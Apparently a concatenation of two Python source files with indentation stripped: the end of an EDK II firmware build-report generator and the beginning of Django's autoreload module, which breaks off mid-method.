FileWrite(File, "*N Module notification function name")
FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
FileWrite(File, gSectionSep)
for Item in self.ItemList:
FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
FileWrite(File, gSectionStart)
##
# Generate Fixed Address report.
#
# This function generate the predicted fixed address report for a module
# specified by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
# @param NotifyList The list of all notify function in a module
#
def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
self._ParseMapFile()
FixedAddressList = self.FixedMapDict.get(Guid)
if not FixedAddressList:
return
FileWrite(File, gSubSectionStart)
FileWrite(File, "Fixed Address Prediction")
FileWrite(File, "*I Image Loading Address")
FileWrite(File, "*E Entry Point Address")
FileWrite(File, "*N Notification Function Address")
FileWrite(File, "*F Flash Address")
FileWrite(File, "*M Memory Address")
FileWrite(File, "*S SMM RAM Offset")
FileWrite(File, "TOM Top of Memory")
FileWrite(File, "Type Address Name")
FileWrite(File, gSubSectionSep)
for Item in FixedAddressList:
Type = Item[0]
Value = Item[1]
Symbol = Item[2]
if Symbol == "*I":
Name = "(Image Base)"
elif Symbol == "*E":
Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
elif Symbol in NotifyList:
Name = Symbol
Symbol = "*N"
else:
continue
if "Flash" in Type:
Symbol += "F"
elif "Memory" in Type:
Symbol += "M"
else:
Symbol += "S"
if Value[0] == "-":
Value = "TOM" + Value
FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
##
# Generate report for the prediction part
#
# This function generate the predicted fixed address report for a module or
# predicted module execution order for a platform.
# If the input Guid is None, then, it generates the predicted module execution order;
# otherwise it generated the module fixed loading address for the module specified by
# Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
#
def GenerateReport(self, File, Guid):
if Guid:
self._GenerateFixedAddressReport(File, Guid.upper(), [])
else:
self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nesting FVs, the nested FVs will list immediate after
# this FD region subsection
#
class FdRegionReport(object):
##
# Discover all the nested FV name list.
#
# This is an internal worker function to discover the all the nested FV information
# in the parent firmware volume. It uses deep first search algorithm recursively to
# find all the FV list name and append them to the list.
#
# @param self The object pointer
# @param FvName The name of current firmware file system
# @param Wa Workspace context information
#
def _DiscoverNestedFvList(self, FvName, Wa):
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self.FvList:
continue
self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
self.FvList.append(FvSection.FvName)
self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
self._DiscoverNestedFvList(FvSection.FvName, Wa)
except AttributeError:
pass
##
# Constructor function for class FdRegionReport
#
# This constructor function generates FdRegionReport object for a specified FdRegion.
# If the FdRegion is a firmware volume, it will recursively find all its nested Firmware
# volume list. This function also collects GUID map in order to dump module identification
# in the final report.
#
# @param self: The object pointer
# @param FdRegion The current FdRegion object
# @param Wa Workspace context information
#
def __init__(self, FdRegion, Wa):
self.Type = FdRegion.RegionType
self.BaseAddress = FdRegion.Offset
self.Size = FdRegion.Size
self.FvList = []
self.FvInfo = {}
self._GuidsDb = {}
self._FvDir = Wa.FvDir
self._WorkspaceDir = Wa.WorkspaceDir
#
# If the input FdRegion is not a firmware volume,
# we are done.
#
if self.Type != BINARY_FILE_TYPE_FV:
return
#
# Find all nested FVs in the FdRegion
#
for FvName in FdRegion.RegionDataList:
if FvName in self.FvList:
continue
self.FvList.append(FvName)
self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
self._DiscoverNestedFvList(FvName, Wa)
PlatformPcds = {}
#
# Collect PCDs declared in DEC files.
#
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
#
# Collect PCDs defined in DSC file
#
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
#
# Add PEI and DXE a priori files GUIDs defined in PI specification.
#
self._GuidsDb[PEI_APRIORI_GUID] = "PEI Apriori"
self._GuidsDb[DXE_APRIORI_GUID] = "DXE Apriori"
#
# Add ACPI table storage file
#
self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"
for Pa in Wa.AutoGenObjectList:
for ModuleKey in Pa.Platform.Modules:
M = Pa.Platform.Modules[ModuleKey].M
InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)
#
# Collect the GUID map in the FV firmware volume
#
for FvName in self.FvList:
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
try:
#
# collect GUID map for binary EFI file in FDF file.
#
Guid = Ffs.NameGuid.upper()
Match = gPcdGuidPattern.match(Ffs.NameGuid)
if Match:
PcdTokenspace = Match.group(1)
PcdToken = Match.group(2)
if (PcdToken, PcdTokenspace) in PlatformPcds:
GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
for Section in Ffs.SectionList:
try:
ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
self._GuidsDb[Guid] = ModuleSectFile
except AttributeError:
pass
except AttributeError:
pass
##
# Internal worker function to generate report for the FD region
#
# This internal worker function to generate report for the FD region.
# It the type is firmware volume, it lists offset and module identification.
#
# @param self The object pointer
# @param File The file object for report
# @param Title The title for the FD subsection
# @param BaseAddress The base address for the FD region
# @param Size The size of the FD region
# @param FvName The FV name if the FD region is a firmware volume
#
def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
FileWrite(File, gSubSectionStart)
FileWrite(File, Title)
FileWrite(File, "Type: %s" % Type)
FileWrite(File, "Base Address: 0x%X" % BaseAddress)
if self.Type == BINARY_FILE_TYPE_FV:
FvTotalSize = 0
FvTakenSize = 0
FvFreeSize = 0
if FvName.upper().endswith('.FV'):
FileExt = FvName + ".txt"
else:
FileExt = FvName + ".Fv.txt"
if not os.path.isfile(FileExt):
FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
if not os.path.isfile(FvReportFileName):
FvReportFileName = os.path.join(self._FvDir, FileExt)
try:
#
# Collect size info in the firmware volume.
#
FvReport = open(FvReportFileName).read()
Match = gFvTotalSizePattern.search(FvReport)
if Match:
FvTotalSize = int(Match.group(1), 16)
Match = gFvTakenSizePattern.search(FvReport)
if Match:
FvTakenSize = int(Match.group(1), 16)
FvFreeSize = FvTotalSize - FvTakenSize
#
# Write size information to the report file.
#
FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
FileWrite(File, "Offset Module")
FileWrite(File, gSubSectionSep)
#
# Write module offset and module identification to the report file.
#
OffsetInfo = {}
for Match in gOffsetGuidPattern.finditer(FvReport):
Guid = Match.group(2).upper()
OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
OffsetList = sorted(OffsetInfo.keys())
for Offset in OffsetList:
FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FvReportFileName)
else:
FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
FileWrite(File, gSubSectionEnd)
##
# Generate report for the FD region
#
# This function generates report for the FD region.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if (len(self.FvList) > 0):
for FvItem in self.FvList:
Info = self.FvInfo[FvItem]
self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
else:
self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
##
# Constructor function for class FdReport
#
# This constructor function generates FdReport object for a specified
# firmware device.
#
# @param self The object pointer
# @param Fd The current Firmware device object
# @param Wa Workspace context information
#
def __init__(self, Fd, Wa):
self.FdName = Fd.FdUiName
self.BaseAddress = Fd.BaseAddress
self.Size = Fd.Size
self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
self.VPDBaseAddress = 0
self.VPDSize = 0
for index, FdRegion in enumerate(Fd.RegionList):
if str(FdRegion.RegionType) is 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
self.VPDSize = self.FdRegionList[index].Size
break
##
# Generate report for the firmware device.
#
# This function generates report for the firmware device.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSectionStart)
FileWrite(File, "Firmware Device (FD)")
FileWrite(File, "FD Name: %s" % self.FdName)
FileWrite(File, "Base Address: %s" % self.BaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
if len(self.FdRegionList) > 0:
FileWrite(File, gSectionSep)
for FdRegionItem in self.FdRegionList:
FdRegionItem.GenerateReport(File)
if VPDPcdList:
VPDPcdList.sort(key=lambda x: int(x[2], 0))
FileWrite(File, gSubSectionStart)
FileWrite(File, "FD VPD Region")
FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
FileWrite(File, gSubSectionSep)
for item in VPDPcdList:
# Add BaseAddress for offset
Offset = '0x%08X' % (int(item[2], 16) + self.VPDBaseAddress)
IsByteArray, ArrayList = ByteArrayForamt(item[-1])
Skuinfo = item[1]
if len(GlobalData.gSkuids) == 1 :
Skuinfo = GlobalData.gSkuids[0]
if IsByteArray:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], item[-1]))
FileWrite(File, gSubSectionEnd)
FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
##
# Constructor function for class PlatformReport
#
# This constructor function generates PlatformReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def __init__(self, Wa, MaList, ReportType):
self._WorkspaceDir = Wa.WorkspaceDir
self.PlatformName = Wa.Name
self.PlatformDscPath = Wa.Platform
self.Architectures = " ".join(Wa.ArchList)
self.ToolChain = Wa.ToolChain
self.Target = Wa.BuildTarget
self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
self.BuildEnvironment = platform.platform()
self.PcdReport = None
if "PCD" in ReportType:
self.PcdReport = PcdReport(Wa)
self.FdReportList = []
if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
for Fd in Wa.FdfProfile.FdDict:
self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))
self.PredictionReport = None
if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
self.PredictionReport = PredictionReport(Wa)
self.DepexParser = None
if "DEPEX" in ReportType:
self.DepexParser = DepexParser(Wa)
self.ModuleReportList = []
if MaList is not None:
self._IsModuleBuild = True
for Ma in MaList:
self.ModuleReportList.append(ModuleReport(Ma, ReportType))
else:
self._IsModuleBuild = False
for Pa in Wa.AutoGenObjectList:
ModuleAutoGenList = []
for ModuleKey in Pa.Platform.Modules:
ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
if GlobalData.gFdfParser is not None:
if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
for InfName in INFList:
InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile)
if Ma is None:
continue
if Ma not in ModuleAutoGenList:
ModuleAutoGenList.append(Ma)
for MGen in ModuleAutoGenList:
self.ModuleReportList.append(ModuleReport(MGen, ReportType))
##
# Generate report for the whole platform.
#
# This function generates report for platform information.
# It comprises of platform summary, global PCD, flash and
# module list sections.
#
# @param self The object pointer
# @param File The file object for report
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen Phase
# @param MakeTime The total time of Make Phase
# @param GenFdsTime The total time of GenFds Phase
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
FileWrite(File, "Platform Summary")
FileWrite(File, "Platform Name: %s" % self.PlatformName)
FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
FileWrite(File, "Architectures: %s" % self.Architectures)
FileWrite(File, "Tool Chain: %s" % self.ToolChain)
FileWrite(File, "Target: %s" % self.Target)
if GlobalData.gSkuids:
FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
if GlobalData.gDefaultStores:
FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
FileWrite(File, "Output Path: %s" % self.OutputPath)
FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
FileWrite(File, "Build Duration: %s" % BuildDuration)
if AutoGenTime:
FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
if MakeTime:
FileWrite(File, "Make Duration: %s" % MakeTime)
if GenFdsTime:
FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
FileWrite(File, "Report Content: %s" % ", ".join(ReportType))
if GlobalData.MixedPcd:
FileWrite(File, gSectionStart)
FileWrite(File, "The following PCDs use different access methods:")
FileWrite(File, gSectionSep)
for PcdItem in GlobalData.MixedPcd:
FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
FileWrite(File, gSectionEnd)
if not self._IsModuleBuild:
if "PCD" in ReportType:
self.PcdReport.GenerateReport(File, None)
if "FLASH" in ReportType:
for FdReportListItem in self.FdReportList:
FdReportListItem.GenerateReport(File)
for ModuleReportItem in self.ModuleReportList:
ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)
if not self._IsModuleBuild:
if "EXECUTION_ORDER" in ReportType:
self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contain the routines to collect data and then
# applies certain format to the output report
#
class BuildReport(object):
##
# Constructor function for class BuildReport
#
# This constructor function generates BuildReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param ReportFile The file name to save report file
# @param ReportType The kind of report items in the final report file
#
def __init__(self, ReportFile, ReportType):
self.ReportFile = ReportFile
if ReportFile:
self.ReportList = []
self.ReportType = []
if ReportType:
for ReportTypeItem in ReportType:
if ReportTypeItem not in self.ReportType:
self.ReportType.append(ReportTypeItem)
else:
self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
##
# Adds platform report to the list
#
# This function adds a platform report to the final report list.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def AddPlatformReport(self, Wa, MaList=None):
if self.ReportFile:
self.ReportList.append((Wa, MaList))
##
# Generates the final report.
#
# This function generates platform build report. It invokes GenerateReport()
# method for every platform report in the list.
#
# @param self The object pointer
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen phase
# @param MakeTime The total time of Make phase
# @param GenFdsTime The total time of GenFds phase
#
def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
if self.ReportFile:
try:
File = BytesIO('')
for (Wa, MaList) in self.ReportList:
PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
Content = FileLinesSplit(File.getvalue(), gLineMaxLength)
SaveFileOnChange(self.ReportFile, Content, True)
EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
except IOError:
EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
File.close()
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
pass
|
autoreload.py
|
import functools
import itertools
import logging
import os
import signal
import subprocess
import sys
import threading
import time
import traceback
import weakref
from collections import defaultdict
from pathlib import Path
from types import ModuleType
from zipimport import zipimporter
from django.apps import apps
from django.core.signals import request_finished
from django.dispatch import Signal
from django.utils.functional import cached_property
from django.utils.version import get_version_tuple
autoreload_started = Signal()
file_changed = Signal()
DJANGO_AUTORELOAD_ENV = 'RUN_MAIN'
logger = logging.getLogger('django.utils.autoreload')
# If an error is raised while importing a file, it's not placed in sys.modules.
# This means that any future modifications aren't caught. Keep a list of these
# file paths to allow watching them in the future.
_error_files = []
_exception = None
try:
import termios
except ImportError:
termios = None
try:
import pywatchman
except ImportError:
pywatchman = None
def check_errors(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
global _exception
try:
fn(*args, **kwargs)
except Exception:
_exception = sys.exc_info()
et, ev, tb = _exception
if getattr(ev, 'filename', None) is None:
# get the filename from the last item in the stack
filename = traceback.extract_tb(tb)[-1][0]
else:
filename = ev.filename
if filename not in _error_files:
_error_files.append(filename)
raise
return wrapper
def raise_last_exception():
global _exception
if _exception is not None:
raise _exception[1]
def ensure_echo_on():
"""
Ensure that echo mode is enabled. Some tools such as PDB disable
it which causes usability issues after reload.
"""
if not termios or not sys.stdin.isatty():
return
attr_list = termios.tcgetattr(sys.stdin)
if not attr_list[3] & termios.ECHO:
attr_list[3] |= termios.ECHO
if hasattr(signal, 'SIGTTOU'):
old_handler = signal.signal(signal.SIGTTOU, signal.SIG_IGN)
else:
old_handler = None
termios.tcsetattr(sys.stdin, termios.TCSANOW, attr_list)
if old_handler is not None:
signal.signal(signal.SIGTTOU, old_handler)
def iter_all_python_module_files():
# This is a hot path during reloading. Create a stable sorted list of
# modules based on the module name and pass it to iter_modules_and_files().
# This ensures cached results are returned in the usual case that modules
# aren't loaded on the fly.
keys = sorted(sys.modules)
modules = tuple(m for m in map(sys.modules.__getitem__, keys) if not isinstance(m, weakref.ProxyTypes))
return iter_modules_and_files(modules, frozenset(_error_files))
@functools.lru_cache(maxsize=1)
def iter_modules_and_files(modules, extra_files):
"""Iterate through all modules needed to be watched."""
sys_file_paths = []
for module in modules:
# During debugging (with PyDev) the 'typing.io' and 'typing.re' objects
# are added to sys.modules, however they are types not modules and so
# cause issues here.
if not isinstance(module, ModuleType):
continue
if module.__name__ == '__main__':
# __main__ (usually manage.py) doesn't always have a __spec__ set.
# Handle this by falling back to using __file__, resolved below.
# See https://docs.python.org/reference/import.html#main-spec
# __file__ may not exists, e.g. when running ipdb debugger.
if hasattr(module, '__file__'):
sys_file_paths.append(module.__file__)
continue
if getattr(module, '__spec__', None) is None:
continue
spec = module.__spec__
# Modules could be loaded from places without a concrete location. If
# this is the case, skip them.
if spec.has_location:
origin = spec.loader.archive if isinstance(spec.loader, zipimporter) else spec.origin
sys_file_paths.append(origin)
results = set()
for filename in itertools.chain(sys_file_paths, extra_files):
if not filename:
continue
path = Path(filename)
try:
resolved_path = path.resolve(strict=True).absolute()
except FileNotFoundError:
# The module could have been removed, don't fail loudly if this
# is the case.
continue
except ValueError as e:
# Network filesystems may return null bytes in file paths.
logger.debug('"%s" raised when resolving path: "%s"', e, path)
continue
results.add(resolved_path)
return frozenset(results)
@functools.lru_cache(maxsize=1)
def common_roots(paths):
"""
Return a tuple of common roots that are shared between the given paths.
File system watchers operate on directories and aren't cheap to create.
Try to find the minimum set of directories to watch that encompass all of
the files that need to be watched.
"""
# Inspired from Werkzeug:
# https://github.com/pallets/werkzeug/blob/7477be2853df70a022d9613e765581b9411c3c39/werkzeug/_reloader.py
# Create a sorted list of the path components, longest first.
path_parts = sorted([x.parts for x in paths], key=len, reverse=True)
tree = {}
for chunks in path_parts:
node = tree
# Add each part of the path to the tree.
for chunk in chunks:
node = node.setdefault(chunk, {})
# Clear the last leaf in the tree.
node.clear()
# Turn the tree into a list of Path instances.
def _walk(node, path):
for prefix, child in node.items():
yield from _walk(child, path + (prefix,))
if not node:
yield Path(*path)
return tuple(_walk(tree, ()))
def sys_path_directories():
"""
Yield absolute directories from sys.path, ignoring entries that don't
exist.
"""
for path in sys.path:
path = Path(path)
try:
resolved_path = path.resolve(strict=True).absolute()
except FileNotFoundError:
continue
# If the path is a file (like a zip file), watch the parent directory.
if resolved_path.is_file():
yield resolved_path.parent
else:
yield resolved_path
def get_child_arguments():
"""
Return the executable. This contains a workaround for Windows if the
executable is reported to not have the .exe extension which can cause bugs
on reloading.
"""
import django.__main__
args = [sys.executable] + ['-W%s' % o for o in sys.warnoptions]
if sys.argv[0] == django.__main__.__file__:
# The server was started with `python -m django runserver`.
args += ['-m', 'django']
args += sys.argv[1:]
else:
args += sys.argv
return args
def trigger_reload(filename):
logger.info('%s changed, reloading.', filename)
sys.exit(3)
def restart_with_reloader():
new_environ = {**os.environ, DJANGO_AUTORELOAD_ENV: 'true'}
args = get_child_arguments()
while True:
p = subprocess.run(args, env=new_environ, close_fds=False)
if p.returncode != 3:
return p.returncode
class BaseReloader:
def __init__(self):
self.extra_files = set()
self.directory_globs = defaultdict(set)
self._stop_condition = threading.Event()
def watch_dir(self, path, glob):
path = Path(path)
try:
path = path.absolute()
except FileNotFoundError:
logger.debug(
'Unable to watch directory %s as it cannot be resolved.',
path,
exc_info=True,
)
return
logger.debug('Watching dir %s with glob %s.', path, glob)
self.directory_globs[path].add(glob)
def watched_files(self, include_globs=True):
"""
Yield all files that need to be watched, including module files and
files within globs.
"""
yield from iter_all_python_module_files()
yield from self.extra_files
if include_globs:
for directory, patterns in self.directory_globs.items():
for pattern in patterns:
yield from directory.glob(pattern)
def wait_for_apps_ready(self, app_reg, django_main_thread):
"""
Wait until Django reports that the apps have been loaded. If the given
thread has terminated before the apps are ready, then a SyntaxError or
other non-recoverable error has been raised. In that case, stop waiting
for the apps_ready event and continue processing.
Return True if the thread is alive and the ready event has been
triggered, or False if the thread is terminated while waiting for the
event.
"""
while django_main_thread.is_alive():
if app_reg.ready_event.wait(timeout=0.1):
return True
else:
logger.debug('Main Django thread has terminated before apps are ready.')
return False
def run(self, django_main_thread):
logger.debug('Waiting for apps ready_event.')
self.wait_for_apps_ready(apps, django_main_thread)
from django.urls import get_resolver
# Prevent a race condition where URL modules aren't loaded when the
# reloader starts by accessing the urlconf_module property.
try:
get_resolver().urlconf_module
except Exception:
# Loading the urlconf can result in errors during development.
# If this occurs then swallow the error and continue.
pass
logger.debug('Apps ready_event triggered. Sending autoreload_started signal.')
autoreload_started.send(sender=self)
self.run_loop()
def run_loop(self):
ticker = self.tick()
while not self.should_stop:
try:
next(ticker)
except StopIteration:
break
self.stop()
def tick(self):
"""
This generator is called in a loop from run_loop. It's important that
the method takes care of pausing or otherwise waiting for a period of
time. This split between run_loop() and tick() is to improve the
testability of the reloader implementations by decoupling the work they
do from the loop.
"""
raise NotImplementedError('subclasses must implement tick().')
@classmethod
def check_availability(cls):
raise NotImplementedError('subclasses must implement check_availability().')
def notify_file_changed(self, path):
results = file_changed.send(sender=self, file_path=path)
logger.debug('%s notified as changed. Signal results: %s.', path, results)
if not any(res[1] for res in results):
trigger_reload(path)
# These are primarily used for testing.
@property
def should_stop(self):
return self._stop_condition.is_set()
def stop(self):
self._stop_condition.set()
class StatReloader(BaseReloader):
SLEEP_TIME = 1 # Check for changes once per second.
def tick(self):
mtimes = {}
while True:
for filepath, mtime in self.snapshot_files():
old_time = mtimes.get(filepath)
mtimes[filepath] = mtime
if old_time is None:
logger.debug('File %s first seen with mtime %s', filepath, mtime)
continue
elif mtime > old_time:
logger.debug('File %s previous mtime: %s, current mtime: %s', filepath, old_time, mtime)
self.notify_file_changed(filepath)
time.sleep(self.SLEEP_TIME)
yield
def snapshot_files(self):
# watched_files may produce duplicate paths if globs overlap.
seen_files = set()
for file in self.watched_files():
if file in seen_files:
continue
try:
mtime = file.stat().st_mtime
except OSError:
# This is thrown when the file does not exist.
continue
seen_files.add(file)
yield file, mtime
@classmethod
def check_availability(cls):
return True
class WatchmanUnavailable(RuntimeError):
pass
class WatchmanReloader(BaseReloader):
def __init__(self):
self.roots = defaultdict(set)
self.processed_request = threading.Event()
self.client_timeout = int(os.environ.get('DJANGO_WATCHMAN_TIMEOUT', 5))
super().__init__()
@cached_property
def client(self):
return pywatchman.client(timeout=self.client_timeout)
def _watch_root(self, root):
# In practice this shouldn't occur, however, it's possible that a
# directory that doesn't exist yet is being watched. If it's outside of
# sys.path then this will end up a new root. How to handle this isn't
# clear: Not adding the root will likely break when subscribing to the
# changes, however, as this is currently an internal API, no files
# will be being watched outside of sys.path. Fixing this by checking
# inside watch_glob() and watch_dir() is expensive, instead this could
# could fall back to the StatReloader if this case is detected? For
# now, watching its parent, if possible, is sufficient.
if not root.exists():
if not root.parent.exists():
logger.warning('Unable to watch root dir %s as neither it or its parent exist.', root)
return
root = root.parent
result = self.client.query('watch-project', str(root.absolute()))
if 'warning' in result:
logger.warning('Watchman warning: %s', result['warning'])
logger.debug('Watchman watch-project result: %s', result)
return result['watch'], result.get('relative_path')
@functools.lru_cache()
def _get_clock(self, root):
return self.client.query('clock', root)['clock']
def _subscribe(self, directory, name, expression):
root, rel_path = self._watch_root(directory)
query = {
'expression': expression,
'fields': ['name'],
'since': self._get_clock(root),
'dedup_results': True,
}
if rel_path:
query['relative_root'] = rel_path
logger.debug('Issuing watchman subscription %s, for root %s. Query: %s', name, root, query)
self.client.query('subscribe', root, name, query)
def _subscribe_dir(self, directory, filenames):
if not directory.exists():
if not directory.parent.exists():
logger.warning('Unable to watch directory %s as neither it or its parent exist.', directory)
return
prefix = 'files-parent-%s' % directory.name
filenames = ['%s/%s' % (directory.name, filename) for filename in filenames]
directory = directory.parent
expression = ['name', filenames, 'wholename']
else:
prefix = 'files'
expression = ['name', filenames]
self._subscribe(directory, '%s:%s' % (prefix, directory), expression)
def _watch_glob(self, directory, patterns):
"""
Watch a directory with a specific glob. If the directory doesn't yet
exist, attempt to watch the parent directory and amend the patterns to
include this. It's important this method isn't called more than one per
directory when updating all subscriptions. Subsequent calls will
overwrite the named subscription, so it must include all possible glob
expressions.
"""
prefix = 'glob'
if not directory.exists():
if not directory.parent.exists():
logger.warning('Unable to watch directory %s as neither it or its parent exist.', directory)
return
prefix = 'glob-parent-%s' % directory.name
patterns = ['%s/%s' % (directory.name, pattern) for pattern in patterns]
directory = directory.parent
expression = ['anyof']
for pattern in patterns:
expression.append(['match', pattern, 'wholename'])
self._subscribe(directory, '%s:%s' % (prefix, directory), expression)
def watched_roots(self, watched_files):
extra_directories = self.directory_globs.keys()
watched_file_dirs = [f.parent for f in watched_files]
sys_paths = list(sys_path_directories())
return frozenset((*extra_directories, *watched_file_dirs, *sys_paths))
def _update_watches(self):
watched_files = list(self.watched_files(include_globs=False))
found_roots = common_roots(self.watched_roots(watched_files))
logger.debug('Watching %s files', len(watched_files))
logger.debug('Found common roots: %s', found_roots)
# Setup initial roots for performance, shortest roots first.
for root in sorted(found_roots):
self._watch_root(root)
for directory, patterns in self.directory_globs.items():
self._watch_glob(directory, patterns)
# Group sorted watched_files by their parent directory.
sorted_files = sorted(watched_files, key=lambda p: p.parent)
for directory, group in itertools.groupby(sorted_files, key=lambda p: p.parent):
# These paths need to be relative to the parent directory.
self._subscribe_dir(directory, [str(p.relative_to(directory)) for p in group])
def update_watches(self):
try:
self._update_watches()
except Exception as ex:
# If the service is still available, raise the original exception.
if self.check_server_status(ex):
raise
def _check_subscription(self, sub):
subscription = self.client.getSubscription(sub)
if not subscription:
return
logger.debug('Watchman subscription %s has results.', sub)
for result in subscription:
# When using watch-project, it's not simple to get the relative
# directory without storing some specific state. Store the full
# path to the directory in the subscription name, prefixed by its
# type (glob, files).
root_directory = Path(result['subscription'].split(':', 1)[1])
logger.debug('Found root directory %s', root_directory)
for file in result.get('files', []):
self.notify_file_changed(root_directory / file)
def request_processed(self, **kwargs):
logger.debug('Request processed. Setting update_watches event.')
self.processed_request.set()
def tick(self):
request_finished.connect(self.request_processed)
